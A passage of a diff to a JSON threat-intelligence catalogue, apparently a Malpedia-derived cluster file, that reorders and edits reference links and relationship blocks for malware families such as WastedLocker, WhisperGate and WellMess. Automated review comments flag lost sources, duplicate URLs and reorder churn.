- "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions",
- "https://www.bbc.com/news/world-us-canada-53195749",
- "https://www.prodaft.com/m/uploads/SilverFish_TLPWHITE.pdf",
- "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://medium.com/walmartglobaltech/wastedloader-or-dridexloader-4f47c9b3ae77",
- "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf",
- "https://www.bleepingcomputer.com/news/security/insurance-giant-cna-hit-by-new-phoenix-cryptolocker-ransomware/",
- "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
- "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/",
- "https://medium.com/cycraft/the-road-to-ransomware-resilience-c1ca37036efd",
- "https://www.bitdefender.com/files/News/CaseStudies/study/397/Bitdefender-PR-Whitepaper-RIG-creat5362-en-EN.pdf",
- "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/",
"https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
- "https://killingthebear.jorgetesta.tech/actors/evil-corp",
+ "https://labs.sentinelone.com/wastedlocker-ransomware-abusing-ads-and-ntfs-file-attributes/",
+ "https://www.bleepingcomputer.com/news/security/new-evil-corp-ransomware-mimics-payloadbin-gang-to-evade-us-sanctions/",
+ "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/",
+ "https://medium.com/walmartglobaltech/wastedloader-or-dridexloader-4f47c9b3ae77",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/",
"https://www.bleepingcomputer.com/news/security/garmin-outage-caused-by-confirmed-wastedlocker-ransomware-attack/",
- "https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf"
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/wastedlocker-ransomware-us",
+ "https://medium.com/cycraft/the-road-to-ransomware-resilience-c1ca37036efd",
+ "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware",
+ "https://www.bleepingcomputer.com/news/security/insurance-giant-cna-hit-by-new-phoenix-cryptolocker-ransomware/",
+ "https://areteir.com/wp-content/uploads/2020/07/Ransomware-WastedLocker-1.pdf",
+ "https://assets.sentinelone.com/sentinellabs/sentinellabs_EvilCorp"
],
"synonyms": [],
"type": []
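Review bot: this hunk drops about a dozen WastedLocker references that are not re-added anywhere in it (the NCC Group write-up `https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/`, the CrowdStrike Hades post, Mandiant's UNC2165 report, the BBC sanctions article, the Prodaft SilverFish PDF, the Talos 2020 year-in-malware post, the Unit 42 and Symantec ransomware reports, the Bitdefender RIG paper and the killingthebear profile), while six others are merely moved. If the upstream Malpedia entry removed them this should be stated in the commit message; otherwise restore them, since a sync should not lose primary sources. The new entry `"https://assets.sentinelone.com/sentinellabs/sentinellabs_EvilCorp"` also looks truncated compared with the other asset links (no file name or extension); please confirm it resolves before merging.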
@@ -47447,12 +50122,12 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.waterbear",
"https://teamt5.org/tw/posts/mjib-holds-briefing-on-chinese-hackers-attacks-on-taiwanese-government-agencies/",
- "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_2_ycy-aragorn_en.pdf",
- "https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Tseng-Mem2Img-Memory-Resident-Malware-Detection-via-Convolution-Neural-Network.pdf",
- "https://www.youtube.com/watch?v=6SDdUVejR2w",
"https://www.zdnet.com/article/waterbear-malware-used-in-attack-wave-against-government-agencies/",
+ "https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Tseng-Mem2Img-Memory-Resident-Malware-Detection-via-Convolution-Neural-Network.pdf",
"https://daydaynews.cc/zh-tw/technology/297265.html",
- "https://www.trendmicro.com/en_us/research/19/l/waterbear-is-back-uses-api-hooking-to-evade-security-product-detection.html"
+ "https://www.youtube.com/watch?v=6SDdUVejR2w",
+ "https://www.trendmicro.com/en_us/research/19/l/waterbear-is-back-uses-api-hooking-to-evade-security-product-detection.html",
+ "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_2_ycy-aragorn_en.pdf"
],
"synonyms": [
"DbgPrint",
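Review bot: this hunk is a pure reorder of the same five Waterbear references, and the same churn repeats in most of the other `refs` hunks in this diff. Since `refs` is an unordered list, have the generator emit it in a stable order (sorted, or in upstream order) so that future Malpedia syncs produce reviewable diffs that show only real additions and removals.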
@@ -47499,15 +50174,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "2d8043b4-48ef-4992-a04a-c342cbbb4f87",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "e57c677f-0117-4e23-8c3f-a772ed809f4c",
"value": "WebC2-AdSpace"
},
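Review bot: this hunk removes the `related` block that linked WebC2-AdSpace to another cluster entry by `dest-uuid` with a `similar` relationship, and the same removal is repeated for every WebC2-* entry and for WellMess below without any replacement. Those links are what tie the Malpedia entries to their counterparts in other galaxies, so dropping them is a functional change rather than a refresh; either explain in the commit message why the relationships are no longer emitted (for example, a changed generator or upstream data) or keep them.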
@@ -47521,15 +50187,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "e2a27431-28ea-42e3-a0cc-72f29828c292",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "64f5ae85-1324-43de-ba3a-063785567be0",
"value": "WebC2-Ausov"
},
@@ -47543,15 +50200,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "a601e1b0-c0bc-4665-9639-4dc5e588520c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "71292a08-9a7b-4df1-b1fd-7d80a8fcc18f",
"value": "WebC2-Bolid"
},
@@ -47565,15 +50213,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "950a8038-eeec-44a0-b3db-a557e5796416",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "5371bc44-dc07-4992-a3d7-c21705c50ac4",
"value": "WebC2-Cson"
},
@@ -47587,15 +50226,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "54be66ea-fd26-4f25-b4af-d10d16fa919f",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "acdda3e5-e776-419b-b060-14f3406de061",
"value": "WebC2-DIV"
},
@@ -47609,15 +50239,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "bfe69071-17bf-466f-97fd-669b72053137",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "cfed10ed-6601-469e-a1df-2d561b031244",
"value": "WebC2-GreenCat"
},
@@ -47631,15 +50252,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "4ef97a7e-5686-44cb-ad91-7a393f32f39b",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "f9f37707-36cf-4ad0-88e0-86f47cbe0ed6",
"value": "WebC2-Head"
},
@@ -47653,15 +50265,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "e2afc267-9674-4ca3-807f-47678fb40da4",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "15094548-7555-43ee-8c0d-4557d6d8a087",
"value": "WebC2-Kt3"
},
@@ -47675,15 +50278,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "84f3bacf-abd5-445e-a98a-5b02f1eaac92",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "71d8ef43-3767-494b-afaa-f58aad70df65",
"value": "WebC2-Qbp"
},
@@ -47697,15 +50291,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "9e36feee-e7d2-400a-960e-5f2bd6ac0c15",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "5350bf3a-26b0-49fb-a0b8-dd68933ea78c",
"value": "WebC2-Rave"
},
@@ -47719,15 +50304,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "269fee27-f275-44e9-a0db-bebf14d2f83c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "1035ea6f-6743-4e69-861c-454c19ec96ae",
"value": "WebC2-Table"
},
@@ -47741,15 +50317,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "d155c213-02bd-4992-a410-a541a1c1eb40",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "b459033c-2d19-49aa-a21f-44a01d1a4156",
"value": "WebC2-UGX"
},
@@ -47763,15 +50330,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "d49f372e-c4ee-47bd-bc98-e3877fabaf9e",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "52c1518d-175c-4b39-bc7c-353d2ddf382e",
"value": "WebC2-Yahoo"
},
@@ -47780,10 +50338,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.webmonitor",
- "https://krabsonsecurity.com/2020/09/04/bitrat-pt-2-hidden-browser-socks5-proxy-and-unknownproducts-unmasked/",
- "https://krebsonsecurity.com/2019/04/whos-behind-the-revcode-webmonitor-rat/",
"https://revcode.se/product/webmonitor/",
+ "https://krebsonsecurity.com/2019/04/whos-behind-the-revcode-webmonitor-rat/",
"https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/malicious-actors-target-comm-apps-such-as-zoom-slack-discord",
+ "https://krabsonsecurity.com/2020/09/04/bitrat-pt-2-hidden-browser-socks5-proxy-and-unknownproducts-unmasked/",
"https://researchcenter.paloaltonetworks.com/2018/04/unit42-say-cheese-webmonitor-rat-comes-c2-service-c2aas/"
],
"synonyms": [
@@ -47812,35 +50370,26 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.wellmess",
- "https://us-cert.cisa.gov/ncas/alerts/aa21-116a",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf",
- "https://blogs.jpcert.or.jp/en/2018/07/malware-wellmes-9b78.html",
- "https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development.pdf",
"https://www.lac.co.jp/lacwatch/pdf/20180614_cecreport_vol3.pdf",
- "https://blog.jpcert.or.jp/2018/07/malware-wellmes-9b78.html",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
- "https://securelist.com/apt-trends-report-q2-2020/97937/",
- "https://www.pwc.co.uk/issues/cyber-security-services/insights/cleaning-up-after-wellmess.html",
- "https://www.botconf.eu/wp-content/uploads/2018/12/2018-Y-Ishikawa-S-Nagano-Lets-go-with-a-Go-RAT-_final.pdf",
- "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b",
- "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors",
- "https://blog.talosintelligence.com/2020/08/attribution-puzzle.html",
- "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf",
"https://community.riskiq.com/article/541a465f/description",
- "https://us-cert.cisa.gov/sites/default/files/publications/AA21-116A_Russian_Foreign_Intelligence_Service_Cyber_Operations_508C.pdf"
+ "https://securelist.com/apt-trends-report-q2-2020/97937/",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b",
+ "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf",
+ "https://www.pwc.co.uk/issues/cyber-security-services/insights/cleaning-up-after-wellmess.html",
+ "https://blog.talosintelligence.com/2020/08/attribution-puzzle.html",
+ "https://us-cert.cisa.gov/sites/default/files/publications/AA21-116A_Russian_Foreign_Intelligence_Service_Cyber_Operations_508C.pdf",
+ "https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development.pdf",
+ "https://www.botconf.eu/wp-content/uploads/2018/12/2018-Y-Ishikawa-S-Nagano-Lets-go-with-a-Go-RAT-_final.pdf",
+ "https://blogs.jpcert.or.jp/en/2018/07/malware-wellmes-9b78.html",
+ "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors",
+ "https://us-cert.cisa.gov/ncas/alerts/aa21-116a",
+ "https://blog.jpcert.or.jp/2018/07/malware-wellmes-9b78.html",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "4fe80228-1142-4e70-9df8-c8f1f3356cfb",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "d84ebd91-58f6-459f-96a1-d028a1719914",
"value": "WellMess"
},
@@ -47857,79 +50406,98 @@
"uuid": "8ec2d984-8c10-49f2-ad97-64af275a7afc",
"value": "WeSteal"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.whiskerspy",
+ "https://www.trendmicro.com/en_us/research/23/b/earth-kitsune-delivers-new-whiskerspy-backdoor.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "821b2c61-31b0-41f5-b604-e58678bf287b",
+ "value": "WhiskerSpy"
+ },
{
"description": "Destructive malware deployed against targets in Ukraine in January 2022.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.whispergate",
- "https://blogs.blackberry.com/en/2022/02/threat-spotlight-whispergate-wiper-wreaks-havoc-in-ukraine",
- "https://github.com/OALabs/Lab-Notes/blob/main/WhisperGate/WhisperGate.ipynb",
- "https://securelist.com/webinar-on-cyberattacks-in-ukraine-summary-and-qa/106075/",
- "https://www.cadosecurity.com/resources-for-dfir-professionals-responding-to-whispergate-malware/",
- "https://unit42.paloaltonetworks.com/atoms/ruinousursa/",
- "https://www.crowdstrike.com/blog/lessons-from-past-cyber-operations-against-ukraine/",
- "https://inquest.net/blog/2022/02/10/380-glowspark",
- "https://unit42.paloaltonetworks.com/ukraine-cyber-conflict-cve-2021-32648-whispergate/",
- "https://www.crowdstrike.com/blog/technical-analysis-of-whispergate-malware/",
- "https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/",
- "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/",
- "https://blog.talosintelligence.com/2022/01/ukraine-campaign-delivers-defacement.html",
- "https://www.crowdstrike.com/blog/who-is-ember-bear/",
- "https://www.secureworks.com/blog/disruptive-attacks-in-ukraine-likely-linked-to-escalating-tensions",
- "https://www.secureworks.com/blog/whispergate-not-notpetya",
- "https://twitter.com/HuskyHacksMK/status/1482876242047258628",
- "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd",
- "https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat",
- "https://intel471.com/blog/russia-ukraine-conflict-cybercrime-underground",
- "https://www.youtube.com/watch?v=2nd-f1dIfD4",
- "https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine",
- "https://github.com/Dump-GUY/Malware-analysis-and-Reverse-engineering/blob/main/Debugging%20MBR%20-%20IDA%20+%20Bochs%20Emulator/Debugging%20MBR%20-%20IDA%20+%20Bochs%20Emulator.md",
- "https://thehackernews.com/2022/02/putin-warns-russian-critical.html",
- "https://www.microsoft.com/security/blog/2022/01/26/evolved-phishing-device-registration-trick-adds-to-phishers-toolbox-for-victims-without-mfa/",
- "https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/",
- "https://www.bitdefender.com/blog/hotforsecurity/five-things-you-need-to-know-about-the-cyberwar-in-ukraine/",
- "https://lifars.com/2022/03/a-closer-look-at-the-russian-actors-targeting-organizations-in-ukraine/",
- "https://www.netskope.com/blog/netskope-threat-coverage-whispergate",
- "https://blogs.blackberry.com/en/2022/01/threat-thursday-whispergate-wiper",
- "https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3",
- "https://www.trendmicro.com/en_us/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict.html",
- "https://lifars.com/2022/01/a-detailed-analysis-of-whispergate-targeting-ukrainian-organizations/",
- "https://blogs.microsoft.com/on-the-issues/2022/01/15/mstic-malware-cyberattacks-ukraine-government/",
- "https://elastic.github.io/security-research/malware/2022/01/01.operation-bleeding-bear/article/",
- "https://www.splunk.com/en_us/blog/security/threat-advisory-strt-ta02-destructive-software.html",
- "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
- "https://cert.gov.ua/article/18101",
- "https://twitter.com/nunohaien/status/1484088885575622657",
- "https://csirt-mon.wp.mil.pl/pl/articles6-aktualnosci/analysis-cyberattack-ukrainian-government-resources/",
- "https://twitter.com/Libranalysis/status/1483128221956808704",
- "https://www.crowdstrike.com/blog/how-crowdstrike-protects-against-data-wiping-malware/",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict/IOC%20Resource%20for%20Russia-Ukraine%20Conflict-Related%20Cyberattacks-03032022.pdf",
- "https://stairwell.com/news/whispers-in-the-noise-microsoft-ukraine-whispergate/",
- "https://cyberpeaceinstitute.org/ukraine-timeline-of-cyberattacks",
- "https://www.splunk.com/en_us/blog/security/threat-advisory-strt-ta02-destructive-software.html?splunk",
- "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/update-on-whispergate-destructive-malware-targeting-ukraine.html",
- "https://rxored.github.io/post/analysis/whispergate/whispergate/",
- "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-057A_Destructive_Malware_Targeting_Organizations_in_Ukraine.pdf",
- "https://info.cyborgsecurity.com/hubfs/Emerging%20Threats/WhisperGate%20Malware%20Update%20-%20Emerging%20Threat.pdf",
- "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/growling-bears-make-thunderous-noise.html",
- "https://zetter.substack.com/p/dozens-of-computers-in-ukraine-wiped",
- "https://www.mandiant.com/resources/russia-invasion-ukraine-retaliation",
- "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/return-of-pseudo-ransomware.html",
"https://blog.gigamon.com/2022/01/28/focusing-on-left-of-boom/",
- "https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview",
- "https://therecord.media/second-data-wiper-attack-hits-ukraine-computer-networks/",
- "https://blog.nviso.eu/2022/02/24/threat-update-ukraine-russia-tensions/",
- "https://twitter.com/knight0x07/status/1483401072102502400",
- "https://zetter.substack.com/p/hackers-were-in-ukraine-systems-months",
- "https://maxkersten.nl/binary-analysis-course/malware-analysis/dumping-whispergates-wiper-from-an-eazfuscator-obfuscated-loader/",
"https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord?",
- "https://eclypsium.com/2022/06/02/conti-targets-critical-firmware/",
- "https://www.cisa.gov/uscert/ncas/alerts/aa22-057a",
- "https://www.tesorion.nl/en/resources/pdfstore/Report-OSINT-Russia-Ukraine-Conflict-Cyberaspect.pdf",
+ "https://unit42.paloaltonetworks.com/atoms/ruinousursa/",
+ "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/return-of-pseudo-ransomware.html",
+ "https://stairwell.com/news/whispers-in-the-noise-microsoft-ukraine-whispergate/",
"https://www.youtube.com/watch?v=Ek3URIaC5O8",
+ "https://www.youtube.com/watch?v=mrTdSdMMgnk",
+ "https://blogs.blackberry.com/en/2022/01/threat-thursday-whispergate-wiper",
+ "https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview",
+ "https://lifars.com/2022/01/a-detailed-analysis-of-whispergate-targeting-ukrainian-organizations/",
+ "https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine",
+ "https://securelist.com/webinar-on-cyberattacks-in-ukraine-summary-and-qa/106075/",
+ "https://zetter.substack.com/p/hackers-were-in-ukraine-systems-months",
"https://go.recordedfuture.com/hubfs/reports/pov-2022-0127.pdf",
"https://www.recordedfuture.com/whispergate-malware-corrupts-computers-ukraine/",
- "https://www.brighttalk.com/webcast/15591/534324"
+ "https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/",
+ "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd",
+ "https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3",
+ "https://github.com/OALabs/Lab-Notes/blob/main/WhisperGate/WhisperGate.ipynb",
+ "https://thehackernews.com/2022/02/putin-warns-russian-critical.html",
+ "https://www.crowdstrike.com/blog/who-is-ember-bear/",
+ "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023",
+ "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/update-on-whispergate-destructive-malware-targeting-ukraine.html",
+ "https://blog.talosintelligence.com/2022/01/ukraine-campaign-delivers-defacement.html",
+ "https://www.cadosecurity.com/resources-for-dfir-professionals-responding-to-whispergate-malware/",
+ "https://www.crowdstrike.com/blog/technical-analysis-of-whispergate-malware/",
+ "https://intel471.com/blog/russia-ukraine-conflict-cybercrime-underground",
+ "https://cert.gov.ua/article/18101",
+ "https://twitter.com/Libranalysis/status/1483128221956808704",
+ "https://rxored.github.io/post/analysis/whispergate/whispergate/",
+ "https://maxkersten.nl/binary-analysis-course/malware-analysis/dumping-whispergates-wiper-from-an-eazfuscator-obfuscated-loader/",
+ "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-057A_Destructive_Malware_Targeting_Organizations_in_Ukraine.pdf",
+ "https://www.bitdefender.com/blog/hotforsecurity/five-things-you-need-to-know-about-the-cyberwar-in-ukraine/",
+ "https://unit42.paloaltonetworks.com/ukraine-cyber-conflict-cve-2021-32648-whispergate/",
+ "https://blogs.microsoft.com/on-the-issues/2022/01/15/mstic-malware-cyberattacks-ukraine-government/",
+ "https://lifars.com/2022/03/a-closer-look-at-the-russian-actors-targeting-organizations-in-ukraine/",
+ "https://www.brighttalk.com/webcast/15591/534324",
+ "https://csirt-mon.wp.mil.pl/pl/articles6-aktualnosci/analysis-cyberattack-ukrainian-government-resources/",
+ "https://cyberpeaceinstitute.org/ukraine-timeline-of-cyberattacks",
+ "https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/03/A-year-of-Russian-hybrid-warfare-in-Ukraine_MS-Threat-Intelligence-1.pdf",
+ "https://www.netskope.com/blog/netskope-threat-coverage-whispergate",
+ "https://blog.nviso.eu/2022/02/24/threat-update-ukraine-russia-tensions/",
+ "https://twitter.com/nunohaien/status/1484088885575622657",
+ "https://www.microsoft.com/security/blog/2022/01/26/evolved-phishing-device-registration-trick-adds-to-phishers-toolbox-for-victims-without-mfa/",
+ "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/growling-bears-make-thunderous-noise.html",
+ "https://blogs.blackberry.com/en/2022/02/threat-spotlight-whispergate-wiper-wreaks-havoc-in-ukraine",
+ "https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/",
+ "https://info.cyborgsecurity.com/hubfs/Emerging%20Threats/WhisperGate%20Malware%20Update%20-%20Emerging%20Threat.pdf",
+ "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
+ "https://twitter.com/HuskyHacksMK/status/1482876242047258628",
+ "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/",
+ "https://twitter.com/knight0x07/status/1483401072102502400",
+ "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/",
+ "https://www.secureworks.com/blog/whispergate-not-notpetya",
+ "https://zetter.substack.com/p/dozens-of-computers-in-ukraine-wiped",
+ "https://services.google.com/fh/files/blogs/google_fog_of_war_research_report.pdf",
+ "https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat",
+ "https://therecord.media/second-data-wiper-attack-hits-ukraine-computer-networks/",
+ "https://www.youtube.com/watch?v=2nd-f1dIfD4",
+ "https://www.crowdstrike.com/blog/how-crowdstrike-protects-against-data-wiping-malware/",
+ "https://www.splunk.com/en_us/blog/security/threat-advisory-strt-ta02-destructive-software.html",
+ "https://www.trendmicro.com/en_us/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict.html",
+ "https://inquest.net/blog/2022/02/10/380-glowspark",
+ "https://www.mandiant.com/resources/russia-invasion-ukraine-retaliation",
+ "https://www.elastic.co/fr/security-labs/operation-bleeding-bear",
+ "https://www.splunk.com/en_us/blog/security/threat-advisory-strt-ta02-destructive-software.html?splunk",
+ "https://elastic.github.io/security-research/malware/2022/01/01.operation-bleeding-bear/article/",
+ "https://www.tesorion.nl/en/resources/pdfstore/Report-OSINT-Russia-Ukraine-Conflict-Cyberaspect.pdf",
+ "https://www.cisa.gov/uscert/ncas/alerts/aa22-057a",
+ "https://eclypsium.com/2022/06/02/conti-targets-critical-firmware/",
+ "https://www.crowdstrike.com/blog/lessons-from-past-cyber-operations-against-ukraine/",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict/IOC%20Resource%20for%20Russia-Ukraine%20Conflict-Related%20Cyberattacks-03032022.pdf",
+ "https://github.com/Dump-GUY/Malware-analysis-and-Reverse-engineering/blob/main/Debugging%20MBR%20-%20IDA%20+%20Bochs%20Emulator/Debugging%20MBR%20-%20IDA%20+%20Bochs%20Emulator.md",
+ "https://www.secureworks.com/blog/disruptive-attacks-in-ukraine-likely-linked-to-escalating-tensions"
],
"synonyms": [
"PAYWIPE"
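Review bot: the new WhiskerSpy entry ships with `"description": ""`, unlike the neighbouring entries, which all carry a one-line summary; the Trend Micro reference listed for it gives enough to write one. In the WhisperGate `refs` list the same resource also appears twice in three cases: the Splunk advisory with and without `?splunk`, the BlackBerry dot-net-stubs post with and without a trailing `?`, and the MSRC blog URL with and without a trailing slash. Normalise query strings and trailing slashes before deduplicating so these collapse to one entry each. The added `https://www.elastic.co/fr/security-labs/operation-bleeding-bear` is the French locale path of a post already listed under `elastic.github.io`; prefer the canonical English URL if one is to be kept.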
@@ -47986,12 +50554,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.windealer",
- "https://blogs.jpcert.or.jp/en/2021/10/windealer.html",
"https://securelist.com/windealer-dealing-on-the-side/105946/",
+ "https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_301_shui-leon_en.pdf",
+ "https://mssplab.github.io/threat-hunting/2023/05/08/malware-analysis-windealer.html",
+ "https://securelist.com/windealer-dealing-on-the-side/105946",
"https://blogs.blackberry.com/en/2022/06/threat-thursday-china-based-apt-plays-auto-updater-card-to-deliver-windealer-malware",
"https://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_7_leon-niwa-ishimaru_en.pdf",
- "https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_301_shui-leon_en.pdf",
- "https://securelist.com/windealer-dealing-on-the-side/105946"
+ "https://blogs.jpcert.or.jp/en/2021/10/windealer.html"
],
"synonyms": [],
"type": []
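Review bot: `https://securelist.com/windealer-dealing-on-the-side/105946/` and `https://securelist.com/windealer-dealing-on-the-side/105946` are the same article and both survive this hunk; the duplicate existed before, but since the list is being rewritten anyway, strip the trailing-slash variant here (and apply the same normalisation in the generator so it does not recur).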
@@ -48017,9 +50586,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.winmm",
+ "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/TheNaikonAPT-MsnMM1.pdf",
"https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf",
- "https://securelist.com/analysis/publications/69953/the-naikon-apt/",
- "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/TheNaikonAPT-MsnMM1.pdf"
+ "https://securelist.com/analysis/publications/69953/the-naikon-apt/"
],
"synonyms": [],
"type": []
@@ -48032,57 +50601,60 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.winnti",
- "https://securelist.com/games-are-over/70991/",
- "http://web.br.de/interaktiv/winnti/english/",
- "https://blog.bushidotoken.net/2022/05/gamer-cheater-hacker-spy.html",
- "https://github.com/br-data/2019-winnti-analyse/",
- "https://securitynews.sonicwall.com/xmlpost/chinas-winnti-spyder-module/",
